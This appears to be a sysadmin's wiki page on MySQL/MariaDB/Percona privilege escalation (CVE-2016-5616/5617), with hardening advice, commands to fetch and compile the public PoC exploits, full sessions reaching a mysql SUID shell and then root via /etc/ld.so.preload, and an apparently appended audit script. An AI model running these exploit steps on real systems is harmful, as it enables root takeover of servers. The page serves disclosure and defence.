#author("2024-09-02T06:37:42+00:00","default:iseki","iseki")
#author("2024-09-02T06:38:33+00:00","default:iseki","iseki")
** CVE-2016-5616, 5617 [#u7059892]
*** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6]
- If someone has an account on the affected machine and can access the database (with write permission), they can seize root privileges.
- This is especially dangerous when the default MySQL users and similar accounts are left in place.

- [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616]]
- [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5617]]

- http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
- http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html


**** Default users [#c3c58224]
- Entries with no password or no user name should be deleted at installation time.

 MariaDB [(none)]> use mysql;
 MariaDB [mysql]> select Host,User,Password from user;
 +-----------+------+-------------------------------------------+
 | Host      | User | Password                                  |
 +-----------+------+-------------------------------------------+
 | localhost | root | *1B1F13007F2FA68140D751B563EB49E0186A116B |
 | rigel-b   | root |                                           |
 | 127.0.0.1 | root |                                           |
 | ::1       | root |                                           |
 | localhost |      |                                           |
 | rigel-b   |      |                                           |
 +-----------+------+-------------------------------------------+

- Delete them with the following commands

 MariaDB [(none)]> use mysql;
 MariaDB [mysql]> delete from user where user='';
 MariaDB [mysql]> delete from user where password='';
 MariaDB [mysql]> flush privileges;

**** Seizing the mysql user account [#z9d7510f]
- Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c]]

 $ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c
 $ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient


 [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test
 
 MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
 mysql-privesc-race.c (ver. 1.0)
 
 CVE-2016-6663 / CVE-2016-5616
 
 For testing purposes only. Do no harm.
 
 Discovered/Coded by:
 
 Dawid Golunski 
 http://legalhackers.com
 
 
 [+] Starting the exploit as: 
 uid=502(iseki) gid=100(users) 所属グループ=100(users)
 
 [+] Connecting to the database `test` as @localhost
 
 [+] Creating exploit temp directory /tmp/mysql_privesc_exploit
 
 [+] Creating mysql tables 
 
 DROP TABLE IF EXISTS exploit_table 
 DROP TABLE IF EXISTS mysql_suid_shell 
 CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
 CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' 
 
 [+] Copying bash into the mysql_suid_shell table.
    After the exploitation the following file/table will be assigned SUID and executable bits : 
 -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
 
 [+] Entering the race loop... Hang in there...
 ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->
 
 [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell: 
 
 -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
 
 [+] Spawning the mysql SUID shell now... 
    Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)
 
 mysql_suid_shell.MYD-4.1$ whoami
 mysql

**** Seizing the root account from the mysql account [#l4b08281]
- Exploit code :  [[mysql-chowned.sh>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]]
- Exploit code :  [[mysql-chowned.sh>http://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]]


 mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err 
 
 MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit 
 mysql-chowned.sh (ver. 1.0)
 
 CVE-2016-6664 / CVE-2016-5617
 
 Discovered and coded by: 
 
 Dawid Golunski 
 http://legalhackers.com 
 
 [+] Starting the exploit as 
 uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users)
 
 [+] Target MySQL log file set to /var/mysql/rigel-b.err
 
 [+] Compiling the privesc shared library (/tmp/privesclib.c)
 
 [+] Backdoor/low-priv shell installed at: 
 -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
 
 [+] Symlink created at: 
 lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload
 
 [+] Waiting for MySQL to re-open the logs/MySQL service restart...
 
 [+] Waiting for MySQL to re-open the logs/MySQL service restart...
 ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません
 Do you want to kill mysqld process  to instantly get root? :) ? [y/n] y
 Got it. Executing 'killall mysqld' now...
 
 [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: 
 -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload
 
 [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
 
 [+] The /etc/ld.so.preload file now contains: 
 /tmp/privesclib.so
 
 [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
 -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
 
 [+] Rootshell got assigned root SUID perms at: 
 -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
 
 Got root! The database server has been ch-OWNED ! 
 
 [+] Spawning the rootshell /tmp/mysqlrootsh now!
 
 mysqlrootsh-4.1# whoami
 root
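
As an added defensive check (not the page's own code and not from the advisory author), the script below audits the two preconditions these PoCs rely on: leftover anonymous or passwordless rows in mysql.user, and root-trusted files such as /etc/ld.so.preload or the server error log that have become symlinks or changed owner. The paths and expected owner names are assumptions taken from the sessions above.

```shell
#!/bin/sh
# Added audit script (not from the original page or the advisory author).
# It checks the two preconditions demonstrated on this page: leftover
# anonymous / passwordless accounts in mysql.user, and root-trusted files
# that have been turned into symlinks or re-owned (the
# /var/mysql/rigel-b.err -> /etc/ld.so.preload step in the session above).

# Read "Host<TAB>User<TAB>Password" rows on stdin, as printed by
#   mysql -N -B -e 'select Host,User,Password from mysql.user'
# Print one line per weak account; exit status 1 if any were found.
audit_user_rows() {
    awk -F'\t' '
        NF == 0  { next }
        $2 == "" { printf "WEAK anonymous account on host %s\n", $1; bad++; next }
        $3 == "" { printf "WEAK empty password for %s@%s\n", $2, $1; bad++ }
        END      { exit (bad > 0) }'
}

# A file that root trusts (/etc/ld.so.preload, the server error log)
# must be a regular file owned by the expected user, never a symlink.
# Usage: check_trusted_file PATH EXPECTED_OWNER
check_trusted_file() {
    path=$1; want=$2
    if [ -L "$path" ]; then
        echo "BAD  $path is a symlink -> $(readlink "$path")"; return 1
    elif [ ! -e "$path" ]; then
        echo "OK   $path does not exist"; return 0
    fi
    owner=$(ls -ld "$path" | awk '{print $3}')
    if [ "$owner" != "$want" ]; then
        echo "BAD  $path is owned by $owner, expected $want"; return 1
    fi
    echo "OK   $path is a regular file owned by $want"
}

# Live run against the paths shown on this page (the log path is the one
# from the session above; adjust it to your server's log-error setting).
if [ "${1:-}" = "--audit" ]; then
    mysql -N -B -e 'select Host,User,Password from mysql.user' | audit_user_rows
    check_trusted_file /etc/ld.so.preload root
    check_trusted_file /var/mysql/rigel-b.err mysql
fi
```

Run it as `sh audit.sh --audit` on the database host; a clean system prints only OK lines and no WEAK rows.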
